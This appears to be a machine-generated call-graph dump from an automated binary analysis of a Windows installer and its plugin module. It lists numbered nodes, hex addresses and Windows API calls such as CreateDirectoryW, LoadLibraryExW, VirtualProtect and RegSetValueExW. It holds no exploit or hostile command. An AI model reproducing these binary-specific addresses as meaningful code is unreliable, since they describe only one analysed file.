405fb4 GlobalFree 4212->4213 4213->4191 4214 4015c1 4215 402d3e 17 API calls 4214->4215 4216 4015c8 4215->4216 4217 405d6e 4 API calls 4216->4217 4227 4015d1 4217->4227 4218 401631 4220 401663 4218->4220 4221 401636 4218->4221 4219 405cf0 CharNextW 4219->4227 4223 401423 24 API calls 4220->4223 4241 401423 4221->4241 4231 40165b 4223->4231 4227->4218 4227->4219 4230 401617 GetFileAttributesW 4227->4230 4233 4059bf 4227->4233 4236 405925 CreateDirectoryW 4227->4236 4245 4059a2 CreateDirectoryW 4227->4245 4229 40164a SetCurrentDirectoryW 4229->4231 4230->4227 4248 4067e3 GetModuleHandleA 4233->4248 4237 405972 4236->4237 4238 405976 GetLastError 4236->4238 4237->4227 4238->4237 4239 405985 SetFileSecurityW 4238->4239 4239->4237 4240 40599b GetLastError 4239->4240 4240->4237 4242 405456 24 API calls 4241->4242 4243 401431 4242->4243 4244 4063ee lstrcpynW 4243->4244 4244->4229 4246 4059b2 4245->4246 4247 4059b6 GetLastError 4245->4247 4246->4227 4247->4246 4249 406809 GetProcAddress 4248->4249 4250 4067ff 4248->4250 4252 4059c6 4249->4252 4254 406773 GetSystemDirectoryW 4250->4254 4252->4227 4253 406805 4253->4249 4253->4252 4255 406795 wsprintfW LoadLibraryExW 4254->4255 4255->4253 5025 402a42 5026 402d1c 17 API calls 5025->5026 5027 402a48 5026->5027 5028 402a88 5027->5028 5029 402a6f 5027->5029 5038 402925 5027->5038 5030 402aa2 5028->5030 5031 402a92 5028->5031 5034 402a74 5029->5034 5035 402a85 5029->5035 5033 40642b 17 API calls 5030->5033 5032 402d1c 17 API calls 5031->5032 5032->5038 5033->5038 5039 4063ee lstrcpynW 5034->5039 5040 406335 wsprintfW 5035->5040 5039->5038 5040->5038 5041 401c43 5042 402d1c 17 API calls 5041->5042 5043 401c4a 5042->5043 5044 402d1c 17 API calls 5043->5044 5045 401c57 5044->5045 5046 401c6c 5045->5046 5047 402d3e 17 API calls 5045->5047 5048 401c7c 5046->5048 5049 402d3e 17 API calls 5046->5049 5047->5046 5050 401cd3 5048->5050 5051 401c87 5048->5051 5049->5048 5052 402d3e 17 API calls 5050->5052 5053 402d1c 17 API calls 5051->5053 5054 401cd8 5052->5054 5055 401c8c 5053->5055 5057 402d3e 17 API calls 5054->5057 5056 402d1c 17 API calls 5055->5056 5058 401c98 5056->5058 5059 401ce1 FindWindowExW 5057->5059 5060 401cc3 SendMessageW 5058->5060 5061 401ca5 SendMessageTimeoutW 5058->5061 5062 401d03 5059->5062 5060->5062 5061->5062 5063 402b43 5064 4067e3 5 API calls 5063->5064 5065 402b4a 5064->5065 5066 402d3e 17 API calls 5065->5066 5067 402b53 5066->5067 5068 402b57 IIDFromString 5067->5068 5070 402b8e 5067->5070 5069 402b66 5068->5069 5068->5070 5069->5070 5073 4063ee lstrcpynW 5069->5073 5072 402b83 CoTaskMemFree 5072->5070 5073->5072 5074 402947 5075 402d3e 17 API calls 5074->5075 5076 402955 5075->5076 5077 40296b 5076->5077 5078 402d3e 17 API calls 5076->5078 5079 405ebf 2 API calls 5077->5079 5078->5077 5080 402971 5079->5080 5102 405ee4 GetFileAttributesW CreateFileW 5080->5102 5082 40297e 5083 402a21 5082->5083 5084 40298a GlobalAlloc 5082->5084 5087 402a29 DeleteFileW 5083->5087 5088 402a3c 5083->5088 5085 4029a3 5084->5085 5086 402a18 CloseHandle 5084->5086 5103 40345a SetFilePointer 5085->5103 5086->5083 5087->5088 5090 4029a9 5091 403444 ReadFile 5090->5091 5092 4029b2 GlobalAlloc 5091->5092 5093 4029c2 5092->5093 5094 4029f6 5092->5094 5095 40324c 31 API calls 5093->5095 5096 405f96 WriteFile 5094->5096 5098 4029cf 5095->5098 5097 402a02 GlobalFree 5096->5097 5099 40324c 31 API calls 5097->5099 5100 4029ed GlobalFree 5098->5100 5101 402a15 5099->5101 5100->5094 5101->5086 5102->5082 5103->5090 5104 4053ca 5105 4053da 5104->5105 5106 4053ee 5104->5106 5107 4053e0 5105->5107 5116 405437 5105->5116 5108 4053f6 IsWindowVisible 5106->5108 5109 40540d 5106->5109 5111 404390 SendMessageW 5107->5111 5112 405403 5108->5112 5108->5116 5110 40543c CallWindowProcW 5109->5110 5122 404d7f 5109->5122 5113 4053ea 5110->5113 5111->5113 5117 404cff SendMessageW 5112->5117 5116->5110 5118 404d22 GetMessagePos ScreenToClient SendMessageW 5117->5118 5119 404d5e SendMessageW 5117->5119 5120 404d56 5118->5120 5121 404d5b 5118->5121 5119->5120 5120->5109 5121->5119 5131 4063ee lstrcpynW 5122->5131 5124 404d92 5132 406335 wsprintfW 5124->5132 5126 404d9c 5127 40140b 2 API calls 5126->5127 5128 404da5 5127->5128 5133 4063ee lstrcpynW 5128->5133 5130 404dac 5130->5116 5131->5124 5132->5126 5133->5130 5137 4016cc 5138 402d3e 17 API calls 5137->5138 5139 4016d2 GetFullPathNameW 5138->5139 5140 4016ec 5139->5140 5146 40170e 5139->5146 5142 40674c 2 API calls 5140->5142 5140->5146 5141 401723 GetShortPathNameW 5143 402bc2 5141->5143 5144 4016fe 5142->5144 5144->5146 5147 4063ee lstrcpynW 5144->5147 5146->5141 5146->5143 5147->5146 5148 401e4e GetDC 5149 402d1c 17 API calls 5148->5149 5150 401e60 GetDeviceCaps MulDiv ReleaseDC 5149->5150 5151 402d1c 17 API calls 5150->5151 5152 401e91 5151->5152 5153 40642b 17 API calls 5152->5153 5154 401ece CreateFontIndirectW 5153->5154 5155 402630 5154->5155 5156 402acf 5157 402d1c 17 API calls 5156->5157 5158 402ad5 5157->5158 5159 402b12 5158->5159 5160 402ae7 5158->5160 5162 402925 5158->5162 5161 40642b 17 API calls 5159->5161 5159->5162 5160->5162 5164 406335 wsprintfW 5160->5164 5161->5162 5164->5162 4731 4020d0 4732 4020e2 4731->4732 4733 402194 4731->4733 4734 402d3e 17 API calls 4732->4734 4735 401423 24 API calls 4733->4735 4736 4020e9 4734->4736 4742 4022ee 4735->4742 4737 402d3e 17 API calls 4736->4737 4738 4020f2 4737->4738 4739 402108 LoadLibraryExW 4738->4739 4740 4020fa GetModuleHandleW 4738->4740 4739->4733 4741 402119 4739->4741 4740->4739 4740->4741 4754 406852 4741->4754 4745 402163 4747 405456 24 API calls 4745->4747 4746 40212a 4748 402132 4746->4748 4749 402149 4746->4749 4751 40213a 4747->4751 4750 401423 24 API calls 4748->4750 4759 73f51777 4749->4759 4750->4751 4751->4742 4752 402186 FreeLibrary 4751->4752 4752->4742 4801 406410 WideCharToMultiByte 4754->4801 4756 40686f 4757 406876 GetProcAddress 4756->4757 4758 402124 4756->4758 4757->4758 4758->4745 4758->4746 4760 73f517aa 4759->4760 4802 73f51b5f 4760->4802 4762 73f517b1 4763 73f518d6 4762->4763 4764 73f517c2 4762->4764 4765 73f517c9 4762->4765 4763->4751 4852 73f5239e 4764->4852 4836 73f523e0 4765->4836 4769 73f517ee 4771 73f5182d 4769->4771 4772 73f5180f 4769->4772 4777 73f51833 4771->4777 4778 73f5187e 4771->4778 4865 73f525b5 4772->4865 4773 73f517df 4776 73f517e5 4773->4776 4781 73f517f0 4773->4781 4774 73f517f8 4774->4769 4862 73f52d83 4774->4862 4776->4769 4846 73f52af8 4776->4846 4884 73f515c6 4777->4884 4779 73f525b5 10 API calls 4778->4779 4785 73f5186f 4779->4785 4780 73f51815 4876 73f515b4 4780->4876 4856 73f52770 4781->4856 4792 73f518c5 4785->4792 4890 73f52578 4785->4890 4790 73f517f6 4790->4769 4791 73f525b5 10 API calls 4791->4785 4792->4763 4796 73f518cf GlobalFree 4792->4796 4796->4763 4798 73f518b1 4798->4792 4894 73f5153d wsprintfW 4798->4894 4799 73f518aa FreeLibrary 4799->4798 4801->4756 4897 73f5121b GlobalAlloc 4802->4897 4804 73f51b86 4898 73f5121b GlobalAlloc 4804->4898 4806 73f51dcb GlobalFree GlobalFree GlobalFree 4807 73f51de8 4806->4807 4818 73f51e32 4806->4818 4809 73f521de 4807->4809 4817 73f51dfd 4807->4817 4807->4818 4808 73f51c86 GlobalAlloc 4823 73f51b91 4808->4823 4810 73f52200 GetModuleHandleW 4809->4810 4809->4818 4811 73f52226 4810->4811 4812 73f52211 LoadLibraryW 4810->4812 4905 73f5161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4811->4905 4812->4811 4812->4818 4813 73f51cd1 lstrcpyW 4816 73f51cdb lstrcpyW 4813->4816 4814 73f51cef GlobalFree 4814->4823 4816->4823 4817->4818 4901 73f5122c 4817->4901 4818->4762 4819 73f52278 4819->4818 4822 73f52285 lstrlenW 4819->4822 4820 73f52086 4904 73f5121b GlobalAlloc 4820->4904 4906 73f5161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4822->4906 4823->4806 4823->4808 4823->4813 4823->4814 4823->4816 4823->4818 4823->4820 4825 73f51fc7 GlobalFree 4823->4825 4826 73f5210e 4823->4826 4829 73f51d2d 4823->4829 4831 73f5122c 2 API calls 4823->4831 4825->4823 4826->4818 4833 73f52176 lstrcpyW 4826->4833 4827 73f52238 4827->4819 4834 73f52262 GetProcAddress 4827->4834 4829->4823 4899 73f5158f GlobalSize GlobalAlloc 4829->4899 4830 73f5229f 4830->4818 4831->4823 4833->4818 4834->4819 4835 73f5208f 4835->4762 4842 73f523f8 4836->4842 4838 73f52521 GlobalFree 4841 73f517cf 4838->4841 4838->4842 4839 73f524a0 GlobalAlloc WideCharToMultiByte 4839->4838 4840 73f524cb GlobalAlloc CLSIDFromString 4840->4838 4841->4769 4841->4773 4841->4774 4842->4838 4842->4839 4842->4840 4843 73f5122c GlobalAlloc lstrcpynW 4842->4843 4845 73f524ea 4842->4845 4908 73f512ba 4842->4908 4843->4842 4845->4838 4912 73f52704 4845->4912 4848 73f52b0a 4846->4848 4847 73f52baf CreateFileA 4851 73f52bcd 4847->4851 4848->4847 4850 73f52c99 4850->4769 4915 73f52aa2 4851->4915 4853 73f523b3 4852->4853 4854 73f517c8 4853->4854 4855 73f523be GlobalAlloc 4853->4855 4854->4765 4855->4853 4860 73f527a0 4856->4860 4857 73f5284e 4859 73f52854 GlobalSize 4857->4859 4861 73f5285e 4857->4861 4858 73f5283b GlobalAlloc 4858->4861 4859->4861 4860->4857 4860->4858 4861->4790 4863 73f52d8e 4862->4863 4864 73f52dce GlobalFree 4863->4864 4919 73f5121b GlobalAlloc 4865->4919 4867 73f52638 MultiByteToWideChar 4872 73f525bf 4867->4872 4868 73f5266b lstrcpynW 4868->4872 4869 73f5265a StringFromGUID2 4869->4872 4870 73f5267e wsprintfW 4870->4872 4871 73f526a2 GlobalFree 4871->4872 4872->4867 4872->4868 4872->4869 4872->4870 4872->4871 4873 73f526d7 GlobalFree 4872->4873 4874 73f51272 2 API calls 4872->4874 4920 73f512e1 4872->4920 4873->4780 4874->4872 4924 73f5121b GlobalAlloc 4876->4924 4878 73f515b9 4879 73f515c6 2 API calls 4878->4879 4880 73f515c3 4879->4880 4881 73f51272 4880->4881 4882 73f512b5 GlobalFree 4881->4882 4883 73f5127b GlobalAlloc lstrcpynW 4881->4883 4882->4785 4883->4882 4885 73f515d2 wsprintfW 4884->4885 4886 73f515ff lstrcpyW 4884->4886 4889 73f51618 4885->4889 4886->4889 4889->4791 4891 73f51891 4890->4891 4892 73f52586 4890->4892 4891->4798 4891->4799 4892->4891 4893 73f525a2 GlobalFree 4892->4893 4893->4892 4895 73f51272 2 API calls 4894->4895 4896 73f5155e 4895->4896 4896->4792 4897->4804 4898->4823 4900 73f515ad 4899->4900 4900->4829 4907 73f5121b GlobalAlloc 4901->4907 4903 73f5123b lstrcpynW 4903->4818 4904->4835 4905->4827 4906->4830 4907->4903 4909 73f512c1 4908->4909 4910 73f5122c 2 API calls 4909->4910 4911 73f512df 4910->4911 4911->4842 4913 73f52712 VirtualAlloc 4912->4913 4914 73f52768 4912->4914 4913->4914 4914->4845 4916 73f52aad 4915->4916 4917 73f52ab2 GetLastError 4916->4917 4918 73f52abd 4916->4918 4917->4918 4918->4850 4919->4872 4921 73f5130c 4920->4921 4922 73f512ea 4920->4922 4921->4872 4922->4921 4923 73f512f0 lstrcpyW 4922->4923 4923->4921 4924->4878 5165 73f510e1 5174 73f51111 5165->5174 5166 73f511d8 GlobalFree 5167 73f512ba 2 API calls 5167->5174 5168 73f511d3 5168->5166 5169 73f51164 GlobalAlloc 5169->5174 5170 73f511f8 GlobalFree 5170->5174 5171 73f51272 2 API calls 5172 73f511c4 GlobalFree 5171->5172 5172->5174 5173 73f512e1 lstrcpyW 5173->5174 5174->5166 5174->5167 5174->5168 5174->5169 5174->5170 5174->5171 5174->5172 5174->5173 5175 4028d5 5176 4028dd 5175->5176 5177 4028e1 FindNextFileW 5176->5177 5178 4028f3 5176->5178 5177->5178 5179 40293a 5177->5179 5181 4063ee lstrcpynW 5179->5181 5181->5178 5182 401956 5183 402d3e 17 API calls 5182->5183 5184 40195d lstrlenW 5183->5184 5185 402630 5184->5185 4980 4014d7 4985 402d1c 4980->4985 4982 4014dd Sleep 4984 402bc2 4982->4984 4986 40642b 17 API calls 4985->4986 4987 402d31 4986->4987 4987->4982 5186 73f5166d 5192 73f51516 5186->5192 5188 73f51685 5189 73f516cb GlobalFree 5188->5189 5190 73f516a0 5188->5190 5191 73f516b7 VirtualFree 5188->5191 5190->5189 5191->5189 5193 73f5151c 5192->5193 5194 73f51522 5193->5194 5195 73f5152e GlobalFree 5193->5195 5194->5188 5195->5188 5011 40175c 5012 402d3e 17 API calls 5011->5012 5013 401763 5012->5013 5014 405f13 2 API calls 5013->5014 5015 40176a 5014->5015 5016 405f13 2 API calls 5015->5016 5016->5015 5196 401d5d 5197 402d1c 17 API calls 5196->5197 5198 401d6e SetWindowLongW 5197->5198 5199 402bc2 5198->5199 5017 401ede 5018 402d1c 17 API calls 5017->5018 5019 401ee4 5018->5019 5020 402d1c 17 API calls 5019->5020 5021 401ef0 5020->5021 5022 401f07 EnableWindow 5021->5022 5023 401efc ShowWindow 5021->5023 5024 402bc2 5022->5024 5023->5024 5200 73f516d4 5201 73f51703 5200->5201 5202 73f51b5f 22 API calls 5201->5202 5203 73f5170a 5202->5203 5204 73f51711 5203->5204 5205 73f5171d 5203->5205 5206 73f51272 2 API calls 5204->5206 5207 73f51744 5205->5207 5208 73f51727 5205->5208 5209 73f5171b 5206->5209 5211 73f5176e 5207->5211 5212 73f5174a 5207->5212 5210 73f5153d 3 API calls 5208->5210 5214 73f5172c 5210->5214 5213 73f5153d 3 API calls 5211->5213 5215 73f515b4 3 API calls 5212->5215 5213->5209 5216 73f515b4 3 API calls 5214->5216 5217 73f5174f 5215->5217 5219 73f51732 5216->5219 5218 73f51272 2 API calls 5217->5218 5220 73f51755 GlobalFree 5218->5220 5221 73f51272 2 API calls 5219->5221 5220->5209 5222 73f51769 GlobalFree 5220->5222 5223 73f51738 GlobalFree 5221->5223 5222->5209 5223->5209 5224 401563 5225 402b08 5224->5225 5228 406335 wsprintfW 5225->5228 5227 402b0d 5228->5227 5229 4026e4 5230 402d1c 17 API calls 5229->5230 5238 4026f3 5230->5238 5231 402830 5232 40273d ReadFile 5232->5231 5232->5238 5233 405f67 ReadFile 5233->5238 5234 402832 5251 406335 wsprintfW 5234->5251 5235 40277d MultiByteToWideChar 5235->5238 5238->5231 5238->5232 5238->5233 5238->5234 5238->5235 5239 4027a3 SetFilePointer MultiByteToWideChar 5238->5239 5240 402843 5238->5240 5242 405fc5 SetFilePointer 5238->5242 5239->5238 5240->5231 5241 402864 SetFilePointer 5240->5241 5241->5231 5243 405fe1 5242->5243 5250 405ff9 5242->5250 5244 405f67 ReadFile 5243->5244 5245 405fed 5244->5245 5246 406002 SetFilePointer 5245->5246 5247 40602a SetFilePointer 5245->5247 5245->5250 5246->5247 5248 40600d 5246->5248 5247->5250 5249 405f96 WriteFile 5248->5249 5249->5250 5250->5238 5251->5231 5252 401968 5253 402d1c 17 API calls 5252->5253 5254 40196f 5253->5254 5255 402d1c 17 API calls 5254->5255 5256 40197c 5255->5256 5257 402d3e 17 API calls 5256->5257 5258 401993 lstrlenW 5257->5258 5259 4019a4 5258->5259 5262 4019e5 5259->5262 5264 4063ee lstrcpynW 5259->5264 5261 4019d5 5261->5262 5263 4019da lstrlenW 5261->5263 5263->5262 5264->5261 4562 73f529df 4563 73f52a2f 4562->4563 4564 73f529ef VirtualProtect 4562->4564 4564->4563 5265 40166a 5266 402d3e 17 API calls 5265->5266 5267 401670 5266->5267 5268 40674c 2 API calls 5267->5268 5269 401676 5268->5269 4565 403e6b 4566 403e83 4565->4566 4567 403fbe 4565->4567 4566->4567 4570 403e8f 4566->4570 4568 40400f 4567->4568 4569 403fcf GetDlgItem GetDlgItem 4567->4569 4574 404069 4568->4574 4582 401389 2 API calls 4568->4582 4573 404344 18 API calls 4569->4573 4571 403e9a SetWindowPos 4570->4571 4572 403ead 4570->4572 4571->4572 4575 403eb2 ShowWindow 4572->4575 4576 403eca 4572->4576 4577 403ff9 SetClassLongW 4573->4577 4578 404390 SendMessageW 4574->4578 4583 403fb9 4574->4583 4575->4576 4579 403ed2 DestroyWindow 4576->4579 4580 403eec 4576->4580 4581 40140b 2 API calls 4577->4581 4605 40407b 4578->4605 4584 4042cd 4579->4584 4585 403ef1 SetWindowLongW 4580->4585 4586 403f02 4580->4586 4581->4568 4587 404041 4582->4587 4584->4583 4593 4042fe ShowWindow 4584->4593 4585->4583 4590 403fab 4586->4590 4591 403f0e GetDlgItem 4586->4591 4587->4574 4592 404045 SendMessageW 4587->4592 4588 40140b 2 API calls 4588->4605 4589 4042cf DestroyWindow EndDialog 4589->4584 4645 4043ab 4590->4645 4594 403f21 SendMessageW IsWindowEnabled 4591->4594 4595 403f3e 4591->4595 4592->4583 4593->4583 4594->4583 4594->4595 4598 403f4b 4595->4598 4599 403f92 SendMessageW 4595->4599 4600 403f5e 4595->4600 4609 403f43 4595->4609 4597 40642b 17 API calls 4597->4605 4598->4599 4598->4609 4599->4590 4602 403f66 4600->4602 4603 403f7b 4600->4603 4606 40140b 2 API calls 4602->4606 4607 40140b 2 API calls 4603->4607 4604 403f79 4604->4590 4605->4583 4605->4588 4605->4589 4605->4597 4608 404344 18 API calls 4605->4608 4627 40420f DestroyWindow 4605->4627 4636 404344 4605->4636 4606->4609 4610 403f82 4607->4610 4608->4605 4642 40431d 4609->4642 4610->4590 4610->4609 4612 4040f6 GetDlgItem 4613 404113 ShowWindow KiUserCallbackDispatcher 4612->4613 4614 40410b 4612->4614 4639 404366 KiUserCallbackDispatcher 4613->4639 4614->4613 4616 40413d EnableWindow 4621 404151 4616->4621 4617 404156 GetSystemMenu EnableMenuItem SendMessageW 4618 404186 SendMessageW 4617->4618 4617->4621 4618->4621 4620 403e4c 18 API calls 4620->4621 4621->4617 4621->4620 4640 404379 SendMessageW 4621->4640 4641 4063ee lstrcpynW 4621->4641 4623 4041b5 lstrlenW 4624 40642b 17 API calls 4623->4624 4625 4041cb SetWindowTextW 4624->4625 4626 401389 2 API calls 4625->4626 4626->4605 4627->4584 4628 404229 CreateDialogParamW 4627->4628 4628->4584 4629 40425c 4628->4629 4630 404344 18 API calls 4629->4630 4631 404267 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4630->4631 4632 401389 2 API calls 4631->4632 4633 4042ad 4632->4633 4633->4583 4634 4042b5 ShowWindow 4633->4634 4635 404390 SendMessageW 4634->4635 4635->4584 4637 40642b 17 API calls 4636->4637 4638 40434f SetDlgItemTextW 4637->4638 4638->4612 4639->4616 4640->4621 4641->4623 4643 404324 4642->4643 4644 40432a SendMessageW 4642->4644 4643->4644 4644->4604 4646 40446e 4645->4646 4647 4043c3 GetWindowLongW 4645->4647 4646->4583 4647->4646 4648 4043d8 4647->4648 4648->4646 4649 404405 GetSysColor 4648->4649 4650 404408 4648->4650 4649->4650 4651 404418 SetBkMode 4650->4651 4652 40440e SetTextColor 4650->4652 4653 404430 GetSysColor 4651->4653 4654 404436 4651->4654 4652->4651 4653->4654 4655 404447 4654->4655 4656 40443d SetBkColor 4654->4656 4655->4646 4657 404461 CreateBrushIndirect 4655->4657 4658 40445a DeleteObject 4655->4658 4656->4655 4657->4646 4658->4657 5270 73f518d9 5271 73f518fc 5270->5271 5272 73f51931 GlobalFree 5271->5272 5273 73f51943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5271->5273 5272->5273 5274 73f51272 2 API calls 5273->5274 5275 73f51ace GlobalFree GlobalFree 5274->5275 5276 4023ec 5277 402d3e 17 API calls 5276->5277 5278 4023fb 5277->5278 5279 402d3e 17 API calls 5278->5279 5280 402404 5279->5280 5281 402d3e 17 API calls 5280->5281 5282 40240e GetPrivateProfileStringW 5281->5282 5283 73f51058 5285 73f51074 5283->5285 5284 73f510dd 5285->5284 5286 73f51092 5285->5286 5287 73f51516 GlobalFree 5285->5287 5288 73f51516 GlobalFree 5286->5288 5287->5286 5289 73f510a2 5288->5289 5290 73f510b2 5289->5290 5291 73f510a9 GlobalSize 5289->5291 5292 73f510b6 GlobalAlloc 5290->5292 5293 73f510c7 5290->5293 5291->5290 5294 73f5153d 3 API calls 5292->5294 5295 73f510d2 GlobalFree 5293->5295 5294->5293 5295->5284 5296 4047ee 5297 404824 5296->5297 5298 4047fe 5296->5298 5300 4043ab 8 API calls 5297->5300 5299 404344 18 API calls 5298->5299 5301 40480b SetDlgItemTextW 5299->5301 5302 404830 5300->5302 5301->5297 4690 40176f 4691 402d3e 17 API calls 4690->4691 4692 401776 4691->4692 4693 401796 4692->4693 4694 40179e 4692->4694 4729 4063ee lstrcpynW 4693->4729 4730 4063ee lstrcpynW 4694->4730 4697 40179c 4701 40669d 5 API calls 4697->4701 4698 4017a9 4699 405cc3 3 API calls 4698->4699 4700 4017af lstrcatW 4699->4700 4700->4697 4718 4017bb 4701->4718 4702 40674c 2 API calls 4702->4718 4703 405ebf 2 API calls 4703->4718 4705 4017cd CompareFileTime 4705->4718 4706 40188d 4708 405456 24 API calls 4706->4708 4707 401864 4709 405456 24 API calls 4707->4709 4726 401879 4707->4726 4711 401897 4708->4711 4709->4726 4710 4063ee lstrcpynW 4710->4718 4712 40324c 31 API calls 4711->4712 4713 4018aa 4712->4713 4714 4018be SetFileTime 4713->4714 4715 4018d0 CloseHandle 4713->4715 4714->4715 4717 4018e1 4715->4717 4715->4726 4716 40642b 17 API calls 4716->4718 4719 4018e6 4717->4719 4720 4018f9 4717->4720 4718->4702 4718->4703 4718->4705 4718->4706 4718->4707 4718->4710 4718->4716 4723 405a54 MessageBoxIndirectW 4718->4723 4728 405ee4 GetFileAttributesW CreateFileW 4718->4728 4721 40642b 17 API calls 4719->4721 4722 40642b 17 API calls 4720->4722 4724 4018ee lstrcatW 4721->4724 4725 401901 4722->4725 4723->4718 4724->4725 4725->4726 4727 405a54 MessageBoxIndirectW 4725->4727 4727->4726 4728->4718 4729->4697 4730->4698 5303 401a72 5304 402d1c 17 API calls 5303->5304 5305 401a7b 5304->5305 5306 402d1c 17 API calls 5305->5306 5307 401a20 5306->5307 4925 401573 4926 401583 ShowWindow 4925->4926 4927 40158c 4925->4927 4926->4927 4928 402bc2 4927->4928 4929 40159a ShowWindow 4927->4929 4929->4928 5308 4014f5 SetForegroundWindow 5309 402bc2 5308->5309 5310 401ff6 5311 402d3e 17 API calls 5310->5311 5312 401ffd 5311->5312 5313 40674c 2 API calls 5312->5313 5314 402003 5313->5314 5316 402014 5314->5316 5317 406335 wsprintfW 5314->5317 5317->5316 5318 4022f7 5319 402d3e 17 API calls 5318->5319 5320 4022fd 5319->5320 5321 402d3e 17 API calls 5320->5321 5322 402306 5321->5322 5323 402d3e 17 API calls 5322->5323 5324 40230f 5323->5324 5325 40674c 2 API calls 5324->5325 5326 402318 5325->5326 5327 402329 lstrlenW lstrlenW 5326->5327 5331 40231c 5326->5331 5329 405456 24 API calls 5327->5329 5328 405456 24 API calls 5332 402324 5328->5332 5330 402367 SHFileOperationW 5329->5330 5330->5331 5330->5332 5331->5328 5331->5332 5333 401b77 5334 402d3e 17 API calls 5333->5334 5335 401b7e 5334->5335 5336 402d1c 17 API calls 5335->5336 5337 401b87 wsprintfW 5336->5337 5338 402bc2 5337->5338 5339 40447a lstrcpynW lstrlenW 5340 40167b 5341 402d3e 17 API calls 5340->5341 5342 401682 5341->5342 5343 402d3e 17 API calls 5342->5343 5344 40168b 5343->5344 5345 402d3e 17 API calls 5344->5345 5346 401694 MoveFileW 5345->5346 5347 4016a0 5346->5347 5348 4016a7 5346->5348 5350 401423 24 API calls 5347->5350 5349 40674c 2 API calls 5348->5349 5352 4022ee 5348->5352 5351 4016b6 5349->5351 5350->5352 5351->5352 5353 4061b4 36 API calls 5351->5353 5353->5347 5354 403a7b 5355 403a86 5354->5355 5356 403a8a 5355->5356 5357 403a8d GlobalAlloc 5355->5357 5357->5356 5358 40237b 5359 402382 5358->5359 5360 402395 5358->5360 5361 40642b 17 API calls 5359->5361 5362 40238f 5361->5362 5362->5360 5363 405a54 MessageBoxIndirectW 5362->5363 5363->5360 5364 73f52349 5365 73f523b3 5364->5365 5366 73f523dd 5365->5366 5367 73f523be GlobalAlloc 5365->5367 5367->5365 5368 4019ff 5369 402d3e 17 API calls 5368->5369 5370 401a06 5369->5370 5371 402d3e 17 API calls 5370->5371 5372 401a0f 5371->5372 5373 401a16 lstrcmpiW 5372->5373 5374 401a28 lstrcmpW 5372->5374 5375 401a1c 5373->5375 5374->5375 5376 401000 5377 401037 BeginPaint GetClientRect 5376->5377 5378 40100c DefWindowProcW 5376->5378 5380 4010f3 5377->5380 5381 401179 5378->5381 5382 401073 CreateBrushIndirect FillRect DeleteObject 5380->5382 5383 4010fc 5380->5383 5382->5380 5384 401102 CreateFontIndirectW 5383->5384 5385 401167 EndPaint 5383->5385 5384->5385 5386 401112 6 API calls 5384->5386 5385->5381 5386->5385 5387 401d81 5388 401d94 GetDlgItem 5387->5388 5389 401d87 5387->5389 5391 401d8e 5388->5391 5390 402d1c 17 API calls 5389->5390 5390->5391 5392 401dd5 GetClientRect LoadImageW SendMessageW 5391->5392 5393 402d3e 17 API calls 5391->5393 5395 401e33 5392->5395 5397 401e3f 5392->5397 5393->5392 5396 401e38 DeleteObject 5395->5396 5395->5397 5396->5397 5398 402482 5399 402d3e 17 API calls 5398->5399 5400 402494 5399->5400 5401 402d3e 17 API calls 5400->5401 5402 40249e 5401->5402 5415 402dce 5402->5415 5405 402bc2 5406 4024d6 5407 4024e2 5406->5407 5409 402d1c 17 API calls 5406->5409 5410 402501 RegSetValueExW 5407->5410 5412 40324c 31 API calls 5407->5412 5408 402d3e 17 API calls 5411 4024cc lstrlenW 5408->5411 5409->5407 5413 402517 RegCloseKey 5410->5413 5411->5406 5412->5410 5413->5405 5416 402de9 5415->5416 5419 406289 5416->5419 5420 406298 5419->5420 5421 4062a3 RegCreateKeyExW 5420->5421 5422 4024ae 5420->5422 5421->5422 5422->5405 5422->5406 5422->5408 5423 402902 5424 402d3e 17 API calls 5423->5424 5425 402909 FindFirstFileW 5424->5425 5426 402931 5425->5426 5429 40291c 5425->5429 5427 40293a 5426->5427 5431 406335 wsprintfW 5426->5431 5432 4063ee lstrcpynW 5427->5432 5431->5427 5432->5429 5433 401503 5434 40150b 5433->5434 5436 40151e 5433->5436 5435 402d1c 17 API calls 5434->5435 5435->5436 5437 404503 5438 40451b 5437->5438 5444 404635 5437->5444 5445 404344 18 API calls 5438->5445 5439 40469f 5440 404769 5439->5440 5441 4046a9 GetDlgItem 5439->5441 5447 4043ab 8 API calls 5440->5447 5442 4046c3 5441->5442 5443 40472a 5441->5443 5442->5443 5451 4046e9 SendMessageW LoadCursorW SetCursor 5442->5451 5443->5440 5452 40473c 5443->5452 5444->5439 5444->5440 5448 404670 GetDlgItem SendMessageW 5444->5448 5446 404582 5445->5446 5449 404344 18 API calls 5446->5449 5450 404764 5447->5450 5470 404366 KiUserCallbackDispatcher 5448->5470 5454 40458f CheckDlgButton 5449->5454 5474 4047b2 5451->5474 5456 404752 5452->5456 5457 404742 SendMessageW 5452->5457 5468 404366 KiUserCallbackDispatcher 5454->5468 5456->5450 5462 404758 SendMessageW 5456->5462 5457->5456 5458 40469a 5471 40478e 5458->5471 5462->5450 5463 4045ad GetDlgItem 5469 404379 SendMessageW 5463->5469 5465 4045c3 SendMessageW 5466 4045e0 GetSysColor 5465->5466 5467 4045e9 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5465->5467 5466->5467 5467->5450 5468->5463 5469->5465 5470->5458 5472 4047a1 SendMessageW 5471->5472 5473 40479c 5471->5473 5472->5439 5473->5472 5477 405a1a ShellExecuteExW 5474->5477 5476 404718 LoadCursorW SetCursor 5476->5443 5477->5476 5478 73f5103d 5481 73f5101b 5478->5481 5482 73f51516 GlobalFree 5481->5482 5483 73f51020 5482->5483 5484 73f51024 5483->5484 5485 73f51027 GlobalAlloc 5483->5485 5486 73f5153d 3 API calls 5484->5486 5485->5484 5487 73f5103b 5486->5487 5488 402889 5489 402890 5488->5489 5492 402b0d 5488->5492 5490 402d1c 17 API calls 5489->5490 5491 402897 5490->5491 5493 4028a6 SetFilePointer 5491->5493 5493->5492 5494 4028b6 5493->5494 5496 406335 wsprintfW 5494->5496 5496->5492 5497 404b8b 5498 404bb7 5497->5498 5499 404b9b 5497->5499 5501 404bea 5498->5501 5502 404bbd SHGetPathFromIDListW 5498->5502 5508 405a38 GetDlgItemTextW 5499->5508 5504 404bd4 SendMessageW 5502->5504 5505 404bcd 5502->5505 5503 404ba8 SendMessageW 5503->5498 5504->5501 5506 40140b 2 API calls 5505->5506 5506->5504 5508->5503 5509 40190c 5510 401943 5509->5510 